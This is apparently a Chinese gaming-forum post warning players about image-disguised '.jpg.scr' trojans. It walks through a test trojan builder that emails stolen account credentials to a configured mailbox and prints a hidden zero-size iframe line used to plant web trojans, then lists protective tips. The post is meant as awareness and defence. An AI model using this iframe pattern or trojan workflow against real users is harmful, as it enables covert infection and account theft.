【图解】图片木马如何无声息的拿走你的帐号
前几天看了"夜无痕"写的 【图解】“视频女”盗号的详细步骤...
自己也一时兴起,在网上找了一个测试版本的木马,为大家图解一下,另两种形式木马.
夜无痕仅仅只写了," .cmp"程序..
其实还存在 ".JPG.scr" 和".EXE"盗号程序...
JPG格式,懂点电脑的同志,相信你们就会知道,这个是图片格式
..
后缀名字却在 .JPG 后面多了 .scr
上面的图就是,跟木马合成到一起的".jpg.scr"格式的图片
通过点击,打开以后会显示出图片,认真看一下下面的工具栏就能看见,闪出另一种程序,我看不清楚,也没截下图来,因为太快了,仅0.5秒都不到,就没有了
,抱歉这里没让你看到截图.
这种木马,传播不比".cmp"少..
常见的传视频照片,有大部分都是用" .jpg.src"格式的图片跟木马合成的,这里就请大家注意了.
下面给大家看看这种木马的威力.
这个是岁所谓的木马配置器,就是用它跟图片合成的 ..
配置将截取到的密码,帐号,区名,解锁密码,发送到指定邮箱里
好了,我们先生成 " .jpg.SCR".
OK,填写完成,下面生成木马图片
#23好家伙,木马生成成功,就是下面的那个图片了.
生成完成了,我不害别人的
,先声明,我绝对没有用木马动过别人一个号,良心在这摆着呢..
OK,就像很正常一样,图片被你打开了.但在你打开图片的同时,你也打开了木马程序,就是木马已经进入到你的电脑..
先看看我的大话是什么反应
登陆的时候帐号是 275203442a1
进入大话不到2分钟,自己大话关闭,就像结束任务那么妥当,一下就下了
..
我们来看看我配置木马的时候填写的邮箱..
结果是收件箱一封信.
看看,密码给截取了,不过这个是测试版本,会隐藏密码和解锁码
正式版的我就不知道啦.
以上看见这个 ".jpg.scr "格式的图片有多拽吧
还有一种是 " .EXE "应用程序
这个主要是用于网站 "挂马"
引用一段山贼对".EXE "的描述:
无声无息就能入侵你电脑的图片病毒,不需要点击。这种病毒主要是利用了Windows的漏洞,把木马加载在图片中,只要没有打上相应补丁的电脑游览到这些图片的时候就会自动下载该图片信息中所包含的木马信息,进而达到木马种植功能
这个人就是利用了第二中方式。通过图片中加载木马的方式。无声无息使你的机器中木马。
防范方法就是把windows的漏洞堵上! 当然,因为这些漏洞不止Windows有,是很多软件都有,所以你需要把那些常会看到图片的软件的相关漏洞都打上补丁。例如QQ, MSN之类的软件也早在该jpg图片病毒公布之时发布了补丁。 大家可以去下载后打上。
解释一下图片木马的原理:
<iframe src=网马地址 width=0 height=0 frameborder=0>
这句话是htm的术语 说白了就是挂马专用的 可以在当前页面引进令一个页面
<img src=图片地址> htm里面的引用图片
所以建议大家禁止某些敏感脚本的运行。
上面说到两种木马#23,就算你开启了"密码保护"也是没用的..
不信,你可以看看我的的截图#23,我已经开启"密码保护",但还是一样被截取了密码#23
总结起来,比较常见的木马程序 ".cmd " , " .jpg " 和" .exe"
在这里给大家提醒下#23
1.不要随便登陆不明站点,因为一些站点可能就是挂马的地方.
2.不要随意接收他人传送你给你文件.
3.必要的补丁加上去,别懒了哥们,看看是你号重要还是下几个补丁麻烦.
4.防火墙,改装的也装上吧!,网速慢点没事,够自己需要就成..
5,最好别跟我学乱上黑客网站,黑客网站有的也是挂马的地方
,你可跟我比不得啊,我是在网吧玩的,机器坏了就闪人,你呢???
6,老老实实做人,别想着不劳而获,一旦你玩上木马,就跟法律磨擦了.自重谢谢!!!
地界 盘丝洞 心碎の泪
连接地址:http://bbs.yezizhu.com.cn/viewthread.php?tid=997846&extra=page%3D1
已有人对此文章评分
